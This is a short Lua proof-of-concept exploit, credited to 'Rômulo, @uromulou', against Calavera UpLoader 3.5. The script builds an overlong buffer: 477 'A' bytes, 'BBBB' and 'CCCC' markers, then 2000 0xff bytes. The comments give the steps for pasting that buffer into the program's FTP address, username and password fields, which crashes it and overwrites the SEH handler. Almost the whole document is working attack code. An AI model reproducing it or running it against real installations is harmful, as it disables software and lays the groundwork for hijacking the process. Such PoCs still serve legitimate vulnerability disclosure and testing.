-- Title : Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite).
-- Courtesy of Rômulo, @uromulou - Date : 04/01/2021.
-- PoC < Proof of Concept:
--
-- 1 -> Run the lua script, to create file "poc.dat"...
-- 2 -> Copy the content of the new file "poc.dat" to clipboard...
-- 3 -> Open the application...
-- 4 -> Click on "Settings"...
-- 5 -> Paste contents of the generated file into the parameters "FTP Address", "Username and Password". Furthermore, check the box with the statement "Check to save password in preferences"...
-- 6 -> Down...
--
print("-> Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)")
print("-> This exploit was written by Rômulo, @uromulou.")
local buffer = string.rep("A", 477) .. "BBBB" .. "CCCC" .. string.rep("\xff", 2000)
file = io.open("poc.dat", "w")
file:write(buffer)
file:close()